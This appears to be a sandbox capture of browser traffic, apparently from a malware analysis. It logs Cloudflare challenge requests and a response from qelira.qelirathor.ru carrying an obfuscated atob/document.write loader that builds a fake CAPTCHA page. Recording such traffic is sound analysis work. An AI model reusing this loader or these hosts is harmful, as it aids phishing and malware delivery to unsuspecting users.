                                                                                  2025-01-15 02:00:43 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                                  Data Ascii: {"err":100230}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.456743104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:47 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1761043156:1736903627:FepZ0G07M88okGs1roo1whFJjHlwkPb89wlAxNZ6XgE/902245eceb0e5e66/uhSqwIH2Glfhaq6zDtDSmuFXwPhDZ_I3zx70kKifwPg-1736906436-1.1.1.1-l2LrSWA6w7yqxXJj.BQudrtGYyrIxG9yjvullH9o2MeRea8FmWICQyeWv_ac.kLo HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 34678
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  CF-Chl-RetryAttempt: 0
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: uhSqwIH2Glfhaq6zDtDSmuFXwPhDZ_I3zx70kKifwPg-1736906436-1.1.1.1-l2LrSWA6w7yqxXJj.BQudrtGYyrIxG9yjvullH9o2MeRea8FmWICQyeWv_ac.kLo
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:47 UTC16384OUTData Raw: 76 5f 39 30 32 32 34 35 65 63 65 62 30 65 35 65 36 36 3d 34 61 58 4f 50 6b 5a 33 6a 52 61 32 61 32 6c 61 5a 2d 5a 52 77 37 5a 52 32 33 5a 65 74 32 30 4f 2d 61 32 67 55 32 31 35 4f 41 44 77 39 46 43 32 4f 4f 37 41 76 52 6b 45 58 32 34 47 59 24 71 44 2d 32 49 32 6b 24 4d 32 7a 4f 47 52 4d 70 2d 32 70 58 32 41 32 58 30 4d 52 6c 4f 46 61 6b 32 74 49 4f 2d 57 58 6e 36 32 4a 74 56 32 67 24 6b 67 32 71 37 6b 55 58 55 32 46 74 56 32 46 37 6b 6e 32 71 55 49 65 6a 58 32 32 48 37 32 62 75 32 32 76 33 57 33 32 33 53 58 32 6b 62 4e 50 47 48 66 48 58 4f 5a 73 4d 6c 24 58 6e 44 75 61 69 7a 47 50 2d 41 39 55 54 57 72 54 58 79 4d 32 4f 58 57 65 71 32 5a 39 2d 41 2d 2d 42 4f 6c 34 46 4a 47 33 30 7a 6f 6b 61 6a 5a 34 52 59 49 48 34 35 49 38 48 49 55 6b 45 64 39 67 4b 59 4a
                                                                                  Data Ascii: v_902245eceb0e5e66=4aXOPkZ3jRa2a2laZ-ZRw7ZR23Zet20O-a2gU215OADw9FC2OO7AvRkEX24GY$qD-2I2k$M2zOGRMp-2pX2A2X0MRlOFak2tIO-WXn62JtV2g$kg2q7kUXU2FtV2F7kn2qUIejX22H72bu22v3W323SX2kbNPGHfHXOZsMl$XnDuaizGP-A9UTWrTXyM2OXWeq2Z9-A--BOl4FJG30zokajZ4RYIH45I8HIUkEd9gKYJ
                                                                                  2025-01-15 02:00:47 UTC16384OUTData Raw: 24 31 32 2d 37 32 6a 32 41 32 58 32 43 56 71 6c 7a 75 39 2d 32 2d 32 55 32 64 61 2d 59 5a 33 32 74 4d 32 33 5a 54 32 77 71 4f 58 5a 65 24 76 32 32 61 32 69 61 51 4f 46 2d 32 48 32 58 48 47 69 5a 47 32 39 45 5a 32 32 73 32 4c 37 46 6c 5a 66 32 32 24 39 37 4f 4c 32 6b 24 46 59 32 6a 32 43 24 47 67 34 79 32 32 32 6b 73 4c 32 70 37 4a 67 69 5a 32 54 33 2d 62 32 7a 37 2d 58 2d 24 5a 38 61 4c 4d 32 63 5a 54 32 58 69 32 56 32 4a 32 32 37 46 24 32 61 32 51 70 55 45 32 38 37 32 77 39 66 32 53 37 32 37 2d 4e 59 32 52 41 64 39 54 32 76 24 51 4d 47 6a 32 61 32 37 4f 41 72 32 37 4f 32 37 46 4b 5a 63 4f 43 56 47 6a 5a 67 59 6b 44 47 61 32 5a 32 31 24 6b 52 35 77 32 52 71 39 33 52 5a 37 5a 4f 47 69 48 65 32 7a 4d 5a 58 5a 24 4f 37 4f 52 35 32 4a 79 5a 32 39 66 32 37 4f
                                                                                  Data Ascii: $12-72j2A2X2CVqlzu9-2-2U2da-YZ32tM23ZT2wqOXZe$v22a2iaQOF-2H2XHGiZG29EZ22s2L7FlZf22$97OL2k$FY2j2C$Gg4y222ksL2p7JgiZ2T3-b2z7-X-$Z8aLM2cZT2Xi2V2J227F$2a2QpUE2872w9f2S727-NY2RAd9T2v$QMGj2a27OAr27O27FKZcOCVGjZgYkDGa2Z21$kR5w2Rq93RZ7ZOGiHe2zMZXZ$O7OR52JyZ29f27O
                                                                                  2025-01-15 02:00:47 UTC1910OUTData Raw: 54 6d 45 71 43 5a 74 75 24 4f 52 24 5a 64 36 62 5a 42 6b 6b 41 75 4b 48 2d 68 5a 61 35 50 59 61 6a 5a 74 6e 79 77 6b 33 5a 58 61 4c 55 6e 61 30 31 6a 4d 6b 43 52 32 56 75 38 4b 42 71 67 56 66 65 2d 47 2d 5a 34 6a 62 24 39 56 75 37 37 4f 45 6d 2d 5a 4e 35 65 24 32 53 71 67 39 35 6a 5a 4a 46 74 37 77 56 33 4c 64 42 37 4e 2b 32 4c 6e 56 39 73 53 41 72 5a 77 32 5a 44 34 41 4f 36 65 5a 32 6b 53 24 70 32 44 2d 4a 48 76 54 32 36 45 61 24 6d 41 4f 24 4e 58 47 32 55 57 69 30 65 4e 32 32 69 4b 4f 39 69 5a 76 4f 58 71 2b 72 6b 33 47 6a 37 32 4b 46 71 47 6c 37 32 32 6b 61 32 36 32 5a 71 67 75 32 4d 4b 6e 41 38 46 44 61 24 46 31 4f 33 65 65 2d 39 4f 5a 61 4f 47 24 39 39 72 67 59 33 56 2b 63 64 6d 6f 62 51 75 2d 30 66 44 32 58 46 5a 4a 37 42 37 4f 44 33 32 6c 58 46 71
                                                                                  Data Ascii: TmEqCZtu$OR$Zd6bZBkkAuKH-hZa5PYajZtnywk3ZXaLUna01jMkCR2Vu8KBqgVfe-G-Z4jb$9Vu77OEm-ZN5e$2Sqg95jZJFt7wV3LdB7N+2LnV9sSArZw2ZD4AO6eZ2kS$p2D-JHvT26Ea$mAO$NXG2UWi0eN22iKO9iZvOXq+rk3Gj72KFqGl722ka262Zqgu2MKnA8FDa$F1O3ee-9OZaOG$99rgY3V+cdmobQu-0fD2XFZJ7B7OD32lXFq
                                                                                  2025-01-15 02:00:47 UTC1357INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 02:00:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4700
                                                                                  Connection: close
                                                                                  cf-chl-out-s: yZya8q725dWiMO0j7hdfypx+gzniTv018mGnR3XDtS3Go7Uw4ZesxPBHi2gII5Sh447QjXM9iN89+FkL7bwKA0j6kEwSbCNLA3Qy72ZG7OVpWDtvw3XVKcGM+/NElXJqPHAE8bHgYp693sZI4S0ACoN93SFh0ECkW9C86u0GCvmetvLEbK1CPUCXFOhKxQAdgARX5Cwff659QlHAp06xq29Z/LMFr4JuH9UuIaD3Oo0/nvHM+Li1FbwiqmK7vHV+h9XBiew6P43UwjbCTdFL8eimXBDHceVSShrV8d6wnb6nTqKLclCrxlAP77tU+yBNks3F40w4j3dX26cRgNsu5EJUYjGFdVPsDab9DJRjvBaMLVDZfu+m9Lnn6z8Zl+YTkZvFe6TThJAsisJh3vV6LADZp6UnmQJBK+CrRhbebkUHS/FJ+Q6KgkiOEfFxbyVyXCjgGDev0cFCeaypWSCpOx6tv/it7njNoIntiWGrnnHsNh7Va1PkV/M2xdukCdb45/z8d6pesHAvj2tIf+WDDEIWL1Mc+Jz7e5k3sV11QczWOcNqfyNKrK1DLixn3l4Eh8Hljl3h8PBztMxU/bUKl4OcvpvTlPXgsz67flnOclrNP2WTFcj9MkJwlKPrmJRqd5P2bnaOvc2/ZHrn1pfK4jVpoYD2vKcj3fAE4qgbaSkP9MDOxdf8pic+GLGFZ4uT7jA2PCW5Xdy0b++jznChGTTR/PcnUd+ZHbd0DtmTQzGUKOwBHXUpWfzndXbcAfh/ilTKcmwztyyyXwsryZfOjW83mTJvgbarer9sdiUZ98zqMxWJIEXmr8Wk/R8X9PadBJVj/ZZ4yRel2d2fBIDWGAi3FcoW/+1/VyCNc9F2iJlWn9zwLImnww6Xn8lj/STdwZnLBqeGNjDvuQIflnyASiCCgiABW9k8YbdGY2855dsvusjwPJkUm0m2lE08EeJ1I54sqlm7K+CeSNXJmOUgqQ==$NklnGqogaBLGuMBpUFRiAg==
                                                                                  cf-chl-out: eRhbbllxGh1wPkjH1LepkvjXKkc2BVSCldhx7bBWlvr8x4BwjMtPtjPI1uSpULkmLRiZGf0+G2sILDd7B9ApJ8juSHIbiiF1V1uUvH9Wqig=$AH4XSJD6hmp64NoRXEKU0A==
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 9022462e3c97c343-EWR
                                                                                  2025-01-15 02:00:47 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                  Data Ascii: alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 02:00:47 UTC1349INData Raw: 71 36 75 4f 6c 35 79 79 6c 35 69 65 74 34 2b 61 6e 49 47 47 7a 4d 4b 6a 6f 5a 76 4c 75 37 72 53 30 4d 2b 68 30 37 53 74 6f 71 58 59 6d 72 44 66 30 73 75 31 30 36 2f 63 74 4b 2f 44 70 4f 58 4b 79 4f 50 70 7a 73 2b 2b 34 73 62 53 72 73 2f 6c 30 2b 6a 61 77 2f 33 54 31 65 71 33 31 74 6e 63 76 39 7a 41 33 77 72 34 35 74 4d 4c 2b 64 6e 34 79 74 48 68 2b 78 59 46 44 64 38 58 46 67 67 46 31 77 6f 49 2f 74 63 4d 33 51 33 73 2b 65 51 64 33 78 62 79 38 2b 59 5a 4a 41 6e 70 34 77 49 69 4e 69 55 70 41 44 72 72 46 69 58 34 37 77 72 37 39 79 34 77 4f 66 77 78 48 69 46 4b 4f 51 59 55 53 7a 6b 46 4b 42 45 2f 51 30 49 54 48 78 38 75 45 7a 4a 5a 47 6a 55 71 50 42 31 65 4f 30 41 63 52 6a 5a 55 52 57 51 6d 51 6c 68 43 52 47 67 73 57 6d 55 74 50 44 31 66 62 7a 56 32 53 30 70
                                                                                  Data Ascii: q6uOl5yyl5iet4+anIGGzMKjoZvLu7rS0M+h07StoqXYmrDf0su106/ctK/DpOXKyOPpzs++4sbSrs/l0+jaw/3T1eq31tncv9zA3wr45tML+dn4ytHh+xYFDd8XFggF1woI/tcM3Q3s+eQd3xby8+YZJAnp4wIiNiUpADrrFiX47wr79y4wOfwxHiFKOQYUSzkFKBE/Q0ITHx8uEzJZGjUqPB1eO0AcRjZURWQmQlhCRGgsWmUtPD1fbzV2S0p
                                                                                  2025-01-15 02:00:47 UTC1369INData Raw: 49 4b 6e 70 6f 79 4f 71 36 53 35 6c 4b 36 47 64 70 4b 62 74 4d 4f 55 6e 70 4c 48 6f 70 57 47 6d 37 61 63 75 49 65 70 72 63 69 4f 77 4b 43 33 71 61 71 31 6b 71 69 31 70 71 37 56 74 62 44 53 75 4c 7a 61 31 4b 4c 43 75 4e 33 71 78 4f 4c 5a 71 73 61 39 33 61 76 4a 35 75 33 47 78 65 6a 53 37 63 33 47 38 51 44 62 7a 64 72 30 31 38 2f 62 31 64 54 35 77 74 37 59 44 2b 66 64 34 64 30 47 36 4f 49 4c 43 75 48 6c 34 2b 72 54 37 75 77 41 38 51 7a 62 36 67 50 36 41 52 6b 63 2f 76 55 61 34 67 41 4b 36 65 77 63 41 51 67 43 43 41 2f 32 43 41 59 47 43 41 30 53 4c 67 38 79 47 76 67 67 47 78 45 67 48 7a 6f 68 4a 67 70 44 49 6a 35 4e 54 6a 30 63 52 55 64 41 4e 55 45 33 4c 44 51 77 4c 53 34 6f 58 55 30 36 59 6b 34 74 4e 30 41 37 51 54 39 5a 54 47 70 41 58 6d 6c 59 50 6a 34 7a
                                                                                  Data Ascii: IKnpoyOq6S5lK6GdpKbtMOUnpLHopWGm7acuIeprciOwKC3qaq1kqi1pq7VtbDSuLza1KLCuN3qxOLZqsa93avJ5u3GxejS7c3G8QDbzdr018/b1dT5wt7YD+fd4d0G6OILCuHl4+rT7uwA8Qzb6gP6ARkc/vUa4gAK6ewcAQgCCA/2CAYGCA0SLg8yGvggGxEgHzohJgpDIj5NTj0cRUdANUE3LDQwLS4oXU06Yk4tN0A7QT9ZTGpAXmlYPj4z
                                                                                  2025-01-15 02:00:47 UTC1369INData Raw: 4f 38 65 35 79 4d 66 48 70 33 77 73 4e 36 6a 35 62 47 6b 5a 53 45 76 35 66 41 78 59 33 45 70 71 57 71 30 36 6d 67 30 74 57 74 75 4d 54 62 78 38 2b 79 34 4d 72 53 31 75 53 34 77 64 57 2b 36 4f 6e 65 33 75 72 72 79 36 4c 45 37 65 58 46 31 4e 54 46 34 39 69 33 78 38 37 34 39 4c 72 72 79 38 48 30 31 4e 34 46 39 64 72 69 2b 41 4d 46 35 77 66 68 37 50 48 61 35 75 48 71 38 2f 59 44 36 64 58 7a 39 51 33 37 37 2f 72 59 49 53 55 41 46 75 45 51 41 67 58 37 34 67 48 33 2b 2b 63 4c 36 41 54 74 44 79 55 44 4e 77 77 44 45 78 67 58 47 6a 30 32 46 6a 45 4d 52 42 49 66 48 7a 30 6a 46 53 4e 42 48 41 67 66 4c 53 4e 43 52 51 38 6c 53 44 42 5a 4a 69 4d 72 4f 6a 45 59 4f 43 74 4d 50 6b 51 36 4e 54 39 48 49 46 55 30 57 57 6b 2f 4f 54 67 38 51 69 77 37 55 30 64 6f 59 6b 39 4f 51
                                                                                  Data Ascii: O8e5yMfHp3wsN6j5bGkZSEv5fAxY3EpqWq06mg0tWtuMTbx8+y4MrS1uS4wdW+6One3urry6LE7eXF1NTF49i3x8749Lrry8H01N4F9dri+AMF5wfh7PHa5uHq8/YD6dXz9Q377/rYISUAFuEQAgX74gH3++cL6ATtDyUDNwwDExgXGj02FjEMRBIfHz0jFSNBHAgfLSNCRQ8lSDBZJiMrOjEYOCtMPkQ6NT9HIFU0WWk/OTg8Qiw7U0doYk9OQ
                                                                                  2025-01-15 02:00:47 UTC613INData Raw: 4c 72 4b 4f 57 6f 4a 4f 5a 6e 61 58 45 77 70 71 63 75 4b 69 6b 69 4e 47 4d 70 4d 54 4a 31 71 54 59 74 70 69 32 71 62 4f 78 79 74 47 65 73 62 72 61 77 37 7a 54 32 4e 6a 6b 76 63 79 2f 76 4d 72 6d 78 38 66 47 72 4d 4f 77 30 50 6e 57 39 65 66 57 37 50 6e 71 32 2b 4c 39 38 4d 37 53 77 39 55 4a 39 50 72 69 41 2b 4c 4a 33 64 76 39 34 2b 49 47 31 75 37 6d 2b 4f 6f 61 42 78 37 75 39 2f 59 55 47 52 33 39 4a 78 33 68 2b 42 77 5a 35 50 30 75 43 2b 6f 64 43 2f 45 6f 42 2b 7a 74 4f 41 59 55 4f 67 73 4d 50 69 72 32 4c 52 30 35 51 7a 59 69 48 30 49 31 49 78 38 44 4e 30 41 6e 44 53 51 4a 45 31 4a 41 52 68 63 50 53 6b 74 4f 4a 55 68 54 53 56 59 31 55 6a 51 30 50 6b 56 48 51 6a 6b 68 4f 79 4e 44 53 56 6c 72 57 33 46 48 61 30 64 31 52 55 35 52 56 6c 68 39 56 56 31 79 53 6c
                                                                                  Data Ascii: LrKOWoJOZnaXEwpqcuKikiNGMpMTJ1qTYtpi2qbOxytGesbraw7zT2Njkvcy/vMrmx8fGrMOw0PnW9efW7Pnq2+L98M7Sw9UJ9PriA+LJ3dv94+IG1u7m+OoaBx7u9/YUGR39Jx3h+BwZ5P0uC+odC/EoB+ztOAYUOgsMPir2LR05QzYiH0I1Ix8DN0AnDSQJE1JARhcPSktOJUhTSVY1UjQ0PkVHQjkhOyNDSVlrW3FHa0d1RU5RVlh9VV1ySl


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.456744104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:47 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1761043156:1736903627:FepZ0G07M88okGs1roo1whFJjHlwkPb89wlAxNZ6XgE/902245eceb0e5e66/uhSqwIH2Glfhaq6zDtDSmuFXwPhDZ_I3zx70kKifwPg-1736906436-1.1.1.1-l2LrSWA6w7yqxXJj.BQudrtGYyrIxG9yjvullH9o2MeRea8FmWICQyeWv_ac.kLo HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:47 UTC442INHTTP/1.1 400 Bad Request
                                                                                  Date: Wed, 15 Jan 2025 02:00:47 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 14
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  cf-chl-out: iwiP+uKuOHoFqJgqry1WW0tgtuWeNHMg4NKvYCtZs25U0pqmBMQneQ7SIqaaBLZSGIKeCwtFJaljnxOE9QxmWg==$3RTiJlO7trwITe6WVd7dKw==
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 9022463369343308-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 02:00:47 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                                  Data Ascii: {"err":100230}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.456745188.114.96.34438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:47 UTC732OUTGET /1e66qhX9/ HTTP/1.1
                                                                                  Host: qelira.qelirathor.ru
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-User: ?1
                                                                                  Sec-Fetch-Dest: document
                                                                                  Referer: https://aifunygg.planaltinashopping.com.br/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:48 UTC1246INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 02:00:48 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, private
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9wR2rLS8YsI3I4oloj7XWv0ngl%2FX4iRvpZ31uhCDhloYoQhRPXPauL%2B8aAYXx5RX4b1JabTweZT7dILCvNeUj2lmaZgL5rscE%2BaSUbSnUhuZgaTkDFt80jAcr50nA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5028&min_rtt=4805&rtt_var=124&sent=82&recv=50&lost=0&retrans=0&sent_bytes=83193&recv_bytes=7405&delivery_rate=7586992&cwnd=4&unsent_bytes=0&cid=266491b9652ab8c2&ts=767634&x=0"
                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6Im1pWHgrbXRlRitOUXRqOWJpT1NUbFE9PSIsInZhbHVlIjoiNlcyeElxUEhQVFpnc2xqMkZXWVFSWk41QW1oTXg1TkFaUlVyUmZDaWg0eTJRd1ZxWWxieHBRMGlVaGpvRkhCc2JqbWhFalhkZE0wa1lBa2drL1pkb010UHdwY3k5bW9leE9FOTNrVkhSb0dJWTBPVkI2V1gxcWlIR0xTQmFqMmsiLCJtYWMiOiI5MjMyYThlMjUyODc3N2YyZGM0MDM3MTkyMjFjNjVkN2VjODYxN2RiNzkyNmNiMWUyYjI0ZTc3MDlhNmM3OTU5IiwidGFnIjoiIn0%3D; expires=Wed, 15-Jan-2025 04:00:48 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                  2025-01-15 02:00:48 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 6b 32 55 32 46 5a 4d 32 63 72 5a 48 42 48 51 31 5a 53 52 54 52 5a 57 6a 6c 44 51 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 47 31 6e 51 57 45 31 59 6e 6f 79 56 32 52 6c 57 43 74 34 51 32 70 43 4c 32 35 6e 59 6b 52 44 5a 30 55 30 4d 6a 45 33 4e 7a 68 48 62 33 70 52 65 6d 77 33 51 6b 51 7a 5a 6a 42 46 52 6b 31 50 62 48 45 34 64 6a 5a 6b 51 6b 70 5a 51 6c 4e 7a 5a 58 45 76 52 53 39 6c 52 44 46 73 55 56 46 42 57 6e 6c 6d 61 58 42 55 63 56 52 4d 5a 45 78 46 64 45 70 6d 4c 79 74 7a 65 58 64 56 61 58 42 6e 5a 6b 70 33 62 46 46 77 62 6c 4e 46 4f 47 78 6e 4c 30 45 34 56 30 68 43 4d 56 42 5a 4e 6a 4a 6a 64 32 5a 6c 62 45 6c 52 54 79 38
                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ikk2U2FZM2crZHBHQ1ZSRTRZWjlDQXc9PSIsInZhbHVlIjoiSG1nQWE1YnoyV2RlWCt4Q2pCL25nYkRDZ0U0MjE3NzhHb3pRemw3QkQzZjBFRk1PbHE4djZkQkpZQlNzZXEvRS9lRDFsUVFBWnlmaXBUcVRMZExFdEpmLytzeXdVaXBnZkp3bFFwblNFOGxnL0E4V0hCMVBZNjJjd2ZlbElRTy8
                                                                                  2025-01-15 02:00:48 UTC1369INData Raw: 32 61 38 63 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 6a 53 53 35 78 5a 57 78 70 63 6d 46 30 61 47 39 79 4c 6e 4a 31 4c 7a 46 6c 4e 6a 5a 78 61 46 67 35 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e
                                                                                  Data Ascii: 2a8c<script>if(atob("aHR0cHM6Ly9jSS5xZWxpcmF0aG9yLnJ1LzFlNjZxaFg5Lw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20van
                                                                                  2025-01-15 02:00:48 UTC1369INData Raw: 62 6e 52 6c 63 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 64 32 68 70 64 47 55 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 79 4e 48 42 34 4f 77 30 4b 49 43 41 67 49 48 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 6e 30 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4a 76 65 43 42 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 73 4e 43 69 41 67 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4f 69 41 6a 4d 44 41 77 4d 44 41 77 4f 47 45 37 44 51 6f 67 49 43 41 67 5a 6d 78
                                                                                  Data Ascii: bnRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBiYWNrZ3JvdW5kOiAjMDAwMDAwOGE7DQogICAgZmx
                                                                                  2025-01-15 02:00:48 UTC1369INData Raw: 57 77 67 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 68 6c 59 32 74 74 59 58 4a 72 4f 6a 70 68 5a 6e 52 6c 63 69 42 37 44 51 6f 67 49 43 41 67 59 32 39 75 64 47 56 75 64 44 6f 67 49 69 49 37 44 51 6f 67 49 43 41 67 63 47 39 7a 61 58 52 70 62 32 34 36 49 47 46 69 63 32 39 73 64 58 52 6c 4f 77 30 4b 49 43 41 67 49 47 78 6c 5a 6e 51 36 49 44 56 77 65 44 73 4e 43 69 41 67 49 43 42 30 62 33 41 36 49 44 46 77 65 44 73 4e 43 69 41 67 49 43 42 33 61 57 52 30 61 44 6f 67 4e 6e 42 34 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 4a 77 65 44 73 4e 43 69 41 67 49 43 42 69 62 33 4a 6b 5a 58 49 36 49 48 4e 76 62 47 6c 6b 49 43 4d 30 59 32 46 6d 4e 54 41 37 44 51 6f 67 49 43 41 67 59 6d 39 79 5a 47 56 79 4c 58 64 70 5a 48 52 6f 4f 69 41 77 49 44 4e 77
                                                                                  Data Ascii: WwgLmNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDogNnB4Ow0KICAgIGhlaWdodDogMTJweDsNCiAgICBib3JkZXI6IHNvbGlkICM0Y2FmNTA7DQogICAgYm9yZGVyLXdpZHRoOiAwIDNw
